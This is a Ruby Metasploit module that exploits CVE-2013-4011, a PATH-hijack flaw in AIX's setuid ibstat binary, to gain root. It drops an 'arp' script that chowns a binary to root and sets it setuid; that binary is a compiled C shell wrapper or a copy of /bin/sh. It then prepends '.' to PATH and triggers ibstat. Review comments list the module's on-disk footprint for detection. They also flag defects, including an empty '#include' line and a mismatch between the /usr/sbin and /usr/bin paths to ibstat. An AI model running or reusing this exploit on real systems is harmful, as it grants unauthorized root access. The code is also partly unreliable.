# Not sure if the deps are correct
require 'msf/core'
require 'rex'

# Local privilege-escalation module for CVE-2013-4011: the setuid binary
# /usr/bin/ibstat on AIX resolves a helper command (`arp`) through the caller's
# PATH instead of an absolute path, so a planted `arp` script runs as root.
#
# Observable footprint of a run, as written below (useful for detection and
# clean-up review):
#   * a file named `arp` and an 8-letter random file (plus a transient `.c`
#     file when gcc is present) created in the `WritableDir` option's path;
#   * `chown root` / `chmod 4555` applied to the random file, i.e. a new
#     setuid-root executable owned by root appears on disk;
#   * `/usr/bin/ibstat -a -i en0` executed with `.` prepended to PATH;
#   * the `arp` file is removed afterwards, but the setuid-root file is not.
# The two IBM support references listed under 'References' are the vendor
# fix for the underlying PATH issue.
class Metasploit4 < Msf::Exploit::Local
  Rank = ExcellentRanking

  # Registers module metadata (name, references, targets) and the single
  # `WritableDir` option used as the drop location for all created files.
  def initialize(info={})
    super( update_info( info, {
      'Name' => 'ibstat $PATH Privilege Escalation',
      'Description' => %q{ This module exploits the trusted PATH environment variable of the SUID binary 'ibstat'. },
      'Author' => [
        'Kristian Erik Hermansen', #original author
        'Sagi Shahar (sagi-) ', #msf module
        'Kostas Lintovois ', #msf module
      ],
      'References' => [
        [ 'CVE', '2013-4011' ],
        [ 'OSVDB', '95420' ],
        [ 'BID', '61287' ],
        [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827' ],
        [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756' ]
      ],
      'Platform' => [ 'aix' ],
      'Arch' => [ 'ppc' ],
      'Targets' => [
        [ 'IBM AIX Version 6.1', { 'Arch' => 'ppc', 'Platform' => 'aix', 'AIX' => '6.1', } ],
        [ 'IBM AIX Version 7.1', { 'Arch' => 'ppc', 'Platform' => 'aix', 'AIX' => '7.1', } ],
      ],
      'DefaultTarget' => 1,
    } ))
    # Default of "." means files are dropped into the session's current
    # working directory.
    register_options([
      OptString.new("WritableDir", [ true, "A directory where we can write files", "." ]),
    ], self.class)
  end

  # Module entry point. Sequence: vulnerability check, drop of a payload
  # executable (compiled C when gcc is available, otherwise a copy of /bin/sh),
  # drop of the `arp` script, PATH change, ibstat invocation, removal of the
  # `arp` script, and a root check.
  #
  # NOTE(review): PATH is prefixed with a literal `.`, not with
  # datastore["WritableDir"]; the code therefore assumes the session's cwd is
  # the same directory the files were written to — not established here.
  # NOTE(review): whether the PATH assignment from one cmd_exec call is still in
  # effect for the later ibstat call depends on the session type — TODO confirm.
  def exploit
    if not is_vuln()
      return
    end
    # Random name for the executable that ends up setuid root; fixed name
    # `arp` for the script ibstat is expected to pick up through PATH.
    root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
    arp_file = "#{datastore["WritableDir"]}/arp"
    if (is_gcc_installed == true)
      write_c_file("#{root_file}")
      print_status("Compiling source...")
      cmd_exec "gcc -o #{root_file} #{root_file}" + ".c"
      print_status("Compilation completed")
      print_status("Deleting source...")
      cmd_exec "rm #{root_file}.c"
    else
      # No compiler: the setuid file will be a plain copy of /bin/sh.
      cmd_exec "cp /bin/sh " + "#{root_file}"
    end
    print_status("Writing custom arp file...")
    write_arp_file("#{arp_file}","#{root_file}")
    print_status("Custom arp file written")
    print_status("Updating PATH environment variable...")
    cmd_exec 'PATH=.:$PATH'
    cmd_exec 'export PATH'
    print_status("Triggering vulnerablity...")
    # Both stdout and stderr of ibstat are discarded; success is judged only
    # by verify_root below.
    cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null'
    print_status("Removing custom arp...")
    cmd_exec "rm #{arp_file}"
    print_status("Checking root privileges...")
    verify_root("#{root_file}")
  end

  # Runs `gcc -v` on the target and reports whether any output line contains
  # "gcc version".
  #
  # @return [Boolean] true when such a line is found, false otherwise
  # NOTE(review): `gcc -v` writes its banner to stderr on common gcc builds;
  # whether cmd_exec returns stderr here depends on the session — TODO confirm.
  def is_gcc_installed
    print_status("Checking if gcc exists...")
    gcc_version = cmd_exec 'gcc -v'
    gcc_array = gcc_version.split("\n")
    gcc_array.each do |res|
      if res.include? ("gcc version")
        print_good("gcc found! " + "(" + "#{res}" + ")")
        return true
      end
    end
    print_status("gcc not found. Using /bin/sh from local system")
    return false;
  end

  # Writes a small C program to `filename`.c on the target, one `echo` per
  # line. The program sets real/effective uid and gid to 0 and then execs
  # /bin/sh; it only gains anything once the binary has been made setuid root
  # by the `arp` script.
  #
  # @param filename [String] path of the executable to be built; ".c" is appended
  # NOTE(review): the first `echo` emits `#include` with no header name — this
  # looks like text lost in transcription; it is runtime text and is left
  # unchanged here.
  def write_c_file(filename)
    c_file = filename + ".c"
    print_status("Dropping file " + c_file + "...")
    cmd_exec "echo \"#include \n\" > " + c_file
    cmd_exec "echo \"int main()\" >> " + c_file
    cmd_exec "echo \"{\" >> " + c_file
    cmd_exec "echo \"setreuid(0,0);\" >> " + c_file
    cmd_exec "echo \"setregid(0,0);\" >> " + c_file
    cmd_exec "echo \"execve(\\\"/bin/sh\\\",NULL,NULL);\" >> " + c_file
    cmd_exec "echo \"return 0;\" >> " + c_file
    cmd_exec "echo \"}\" >> " + c_file
  end

  # Writes the `arp` shell script that ibstat is expected to run as root.
  # The script changes the owner of `bin_file` to root and sets mode 4555
  # (setuid, read/execute for all); the script itself is made mode 0555.
  #
  # @param arp_file [String] path of the script to create
  # @param bin_file [String] path of the executable the script makes setuid root
  def write_arp_file(arp_file, bin_file)
    cmd_exec "echo \"#!/bin/sh\" > " + arp_file
    cmd_exec "echo \"chown root " + bin_file + "\" >> " + arp_file
    cmd_exec "echo \"chmod 4555 " + bin_file + "\" >> " + arp_file
    cmd_exec "chmod 0555 " + arp_file
  end

  # Executes the dropped file and then runs `id`, reporting success when the
  # output shows euid 0 or uid 0.
  #
  # @param filename [String] path of the executable to run
  # NOTE(review): assumes the `id` command runs in the context left behind by
  # `filename` (e.g. the shell it execs) — session-dependent, not verified here.
  def verify_root(filename)
    cmd_exec filename
    id_output = cmd_exec "id"
    if id_output.include? ("euid=0(root)")
      print_good("Got root! (euid)")
    elsif id_output.include?("uid=0(root)")
      print_good("Got root!")
    else
      print_status("Exploit failed")
    end
  end

  # Checks `ls -l /usr/sbin/ibstat` for the mode string "-r-sr-xr-x", i.e. a
  # setuid binary with that exact permission pattern. Any other mode string
  # (including a patched binary with different permissions) is reported as
  # not vulnerable; the check does not inspect the binary's version.
  #
  # @return [Boolean] true when the mode string matches, false otherwise
  def is_vuln()
    ls_output = cmd_exec "ls -l /usr/sbin/ibstat"
    if ls_output.include? ("-r-sr-xr-x")
      print_good("Target is vulnerable")
      return true
    else
      print_status("Target is not vulnerable")
      return false
    end
  end
end